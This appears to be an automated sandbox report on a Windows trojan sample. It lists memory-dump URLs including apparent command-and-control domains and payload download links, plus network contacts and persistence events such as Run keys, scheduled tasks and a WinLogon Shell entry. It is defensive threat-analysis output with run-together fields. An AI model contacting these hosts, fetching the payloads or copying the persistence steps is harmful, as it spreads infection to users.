                                                                                                                                                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2aaspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://commandejorsk.site/apisaspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      https://s.ytimg.com;aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:curl.exe, 0000001F.00000002.1397098489.000001EC889A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://steam.tv/aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPaspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://underlinemdsj.site/aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://bellykmrebk.site/api2aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://store.steampowered.com/privacy_agreement/RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://bellykmrebk.site/l1aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://bellykmrebk.site/api$aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binscurl.exe, 0000001F.00000002.1397098489.000001EC889A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://sketchfab.comaspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://lv.queniujq.cnaspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://steamcommunity.com/profiles/76561199724331900/inventory/RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.1499818933.000000000114E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://www.youtube.com/aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgaspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://offeviablwke.site/apiCRegAsm.exe, 0000002F.00000002.1504229654.000000000119D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://agentyanlark.site/apiaspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://offeviablwke.site/apiBRegAsm.exe, 0000002F.00000002.1504229654.000000000119D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://cdn.akamRegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://writekdmsnu.site/aspnet_regiis.exe, 00000049.00000002.1577126857.000000000090C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://s.ytimg.comRegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://bellykmrebk.site/t1aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://offeviablwke.site:443/apiaspnet_regiis.exe, 00000049.00000002.1577126857.0000000000923000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.binycurl.exe, 00000015.00000002.1338068890.000001FE19ADA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000015.00000003.1313373390.000001FE19AD9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000015.00000003.1318656770.000001FE19ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://www.google.com/recaptcha/aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://checkout.steampowered.com/aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://file.garden/ZmE_ziOgiFXI9Y48/build.binjWs64curl.exe, 00000037.00000002.1497161944.000002E955E48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://store.steampowered.com/;aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://offeviablwke.site/t1aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        https://store.steampowered.com/about/aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              https://famikyjdiag.site/apiWaspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                https://help.steampowered.com/en/aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    https://steamcommunity.com/market/aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      https://store.steampowered.com/news/aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        https://community.akamai.steamstatic.com/aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          https://writekdmsnu.site/apiaspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  https://recaptcha.net/recaptcha/;aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      https://possiwreeste.site/api;aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        https://offeviablwke.site/T1aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          https://steamcommunity.com/discussions/aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aaspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              https://store.steampowered.com/stats/aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                https://medal.tvaspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  https://broadcast.st.dl.eccdnx.comaspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                    172.67.197.40
                                                                                                                                                                                                                                                                                    offeviablwke.siteUnited States
                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                    188.114.97.3
                                                                                                                                                                                                                                                                                    file.gardenEuropean Union
                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                    188.114.96.3
                                                                                                                                                                                                                                                                                    explorationmsn.storeEuropean Union
                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                    104.102.49.254
                                                                                                                                                                                                                                                                                    steamcommunity.comUnited States
                                                                                                                                                                                                                                                                                    16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                                                                    104.21.1.169
                                                                                                                                                                                                                                                                                    underlinemdsj.siteUnited States
                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                                                                    127.0.0.1
                                                                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                    Analysis ID:1522826
                                                                                                                                                                                                                                                                                    Start date and time:2024-09-30 18:19:07 +02:00
                                                                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                    Overall analysis duration:0h 15m 30s
                                                                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:203
                                                                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                    Sample name:UY9hUZn4CQ.exe
                                                                                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                                                                                    Original Sample Name:b1921e7e0377938146532a5abbd6dda82dff5008a94f921c40f0abf6844f9112.exe
                                                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                                                    Classification:mal100.troj.evad.winEXE@1457/107@33/6
                                                                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                                                    • Successful, ratio: 98%
                                                                                                                                                                                                                                                                                    • Number of executed functions: 37
                                                                                                                                                                                                                                                                                    • Number of non-executed functions: 124
                                                                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                    • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, Sgrmuserer.exe, svchost.exe
                                                                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                    • VT rate limit hit for: UY9hUZn4CQ.exe
                                                                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                                                                    12:20:25API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                                                                    18:20:41Task SchedulerRun new task: winlogon path: "C:\Users\user\AppData\Local\winlogon.exe"
                                                                                                                                                                                                                                                                                    18:20:41Task SchedulerRun new task: winlogonw path: "C:\Users\user\AppData\Local\winlogon.exe"
                                                                                                                                                                                                                                                                                    18:20:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\user\AppData\Local\winlogon.exe"
                                                                                                                                                                                                                                                                                    18:20:44Task SchedulerRun new task: msedge path: "C:\Edge\msedge.exe"
                                                                                                                                                                                                                                                                                    18:20:44Task SchedulerRun new task: msedgem path: "C:\Edge\msedge.exe"
                                                                                                                                                                                                                                                                                    18:20:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                                                                                                                                                    18:21:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\user\AppData\Local\winlogon.exe"
                                                                                                                                                                                                                                                                                    18:21:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                                                                                                                                                    18:21:23AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\user\AppData\Local\winlogon.exe"
                                                                                                                                                                                                                                                                                    18:21:33AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                                                                                                                                                    18:21:52AutostartRun: WinLogon Shell "C:\Users\user\AppData\Local\winlogon.exe"
                                                                                                                                                                                                                                                                                    18:22:02AutostartRun: WinLogon Shell "C:\Edge\msedge.exe"
                                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (795), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):795
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.899437389020907
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:FHUTCZ6JzO7Ch/tJ34eSM3KEOB/At+oIcceoc:FHlZkzDNtJ34iKFB/AGpe/
                                                                                                                                                                                                                                                                                    MD5:BFD52A245139877A9FDB2C297CC55433
                                                                                                                                                                                                                                                                                    SHA1:A117A14429E96A3F8044258896BCAE2D62733474
                                                                                                                                                                                                                                                                                    SHA-256:AD3DC7F84E9F99952FF39184F70B82FABCC55B97C6CA36ADD0B02839337C94AC
                                                                                                                                                                                                                                                                                    SHA-512:07DD03A86DC9508803EAF4BCF47591527C21E223BC3F93754B6F9E52C66FE2993BBD97C387D5B7E477F6CBED8386D5AFFC624A24F5B67410DF1179BDFDB324DF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
